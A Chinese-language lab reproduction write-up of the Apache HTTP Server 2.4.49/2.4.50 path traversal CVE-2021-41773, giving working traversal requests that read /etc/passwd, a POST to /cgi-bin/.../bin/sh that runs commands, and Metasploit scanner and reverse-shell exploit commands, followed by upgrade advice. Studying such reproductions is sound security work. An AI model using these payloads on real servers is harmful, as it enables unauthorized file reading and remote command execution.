apache-cve_2021_41773 复现

apache-cve_2021_41773 复现

  • apache-cve_2021_41773 复现
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 手工复现
      • msf复现
    • 0x04 漏洞修复

apache-cve_2021_41773 复现

Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。

0x01 漏洞描述

2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。

指纹:

app:“apache web server 2.4.49 2.4.50”

0x02 影响范围

Apache HTTPd 2.4.49/2.4.50版本

0x03 漏洞复现

靶场主页

apache-cve_2021_41773 复现_第1张图片

手工复现

(1)文件读取

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

burp抓包 发送如下请求包

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 118.193.36.37:53238
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 09 Oct 2021 03:58:16 GMT
If-None-Match: "29cd-5cde381698600-gzip"
Cache-Control: max-age=0


apache-cve_2021_41773 复现_第2张图片

(2) rce 命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 118.193.36.37:53238
Content-Type: text/plain
Content-Length: 8

echo; id

在这里插入图片描述
执行成功

ls /tmp
apache-cve_2021_41773 复现_第3张图片

msf复现

脚本路径
在这里插入图片描述

(1)扫描是否存在

use auxiliary/linux/http/apache_normalize_path
set rhosts 192.168.157.129
set rport 8080
set SSL false
run

执行发现存在
apache-cve_2021_41773 复现_第4张图片
(2) 漏洞利用 exploit 模块

use exploit/linux/http/apache_normalize_path_rce`
set RHOSTS 192.168.157.129
set RPORT 8080
set SSL false
set LHOST 192.168.157.137
set VERBOSE true
run

apache-cve_2021_41773 复现_第5张图片

在线靶场和docker环境都
返回shell失败

以后再试吧

0x04 漏洞修复

1、若低于 2.4.49版本,可不升级。
2、若Apache HTTPd为 2.4.49版本与Apache HTTPd 2.4.50 ,请尽快升级至最新版本。

你可能感兴趣的:(漏洞复现,apache,安全)